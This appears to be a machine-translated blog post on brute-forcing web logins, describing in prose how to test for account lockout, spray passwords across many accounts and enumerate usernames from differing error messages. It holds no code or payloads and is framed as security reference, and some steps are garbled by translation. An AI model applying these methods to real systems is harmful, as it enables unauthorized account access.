Watch your door.-Authentication mechanism is attacked (3)-intelligent brute force attack landing

The first thing to declare is that this article is purely an ignorant view of a little developer without foresight and knowledge, and is intended only for reference in Web system security.

1. Brief description

The openness of the login feature allows countless attackers to attempt to guess the user name and password to gain unauthorized access to the system.
As a user of the system, you must make your system more robust in response to a cunning attacker.
As an attacker, it is necessary to observe the various details of the system and obtain information that is close to the actual situation.

2. Intelligent brute force attack landing steps

We first need a system with a weak password so that we can try brute force attacks.
1. Try it out with one of your own legitimate accounts, such as submitting a few incorrect landings to see what kind of return information you receive;
2. If you log in after 3-5 errors, you can also log in correctly. Perhaps the system does not have an account lockout strategy, this system is a regular brute force attack landing good target;
3. If the account is locked, you can poll the different accounts to login;
4. If the account is locked, use the valid password to submit the account, and observe the return information of the invalid account is different;

If there is no valid account, then first obtain a valid user name;
Getting the user name is very easy, the most classic one method:
You can see the user name you entered directly behind the others. ：）

If there is a possibility of an account lockout, then the breadth of the account is preferred rather than the depth priority.

Watch your door.-Authentication mechanism is attacked (3)-intelligent brute force attack landing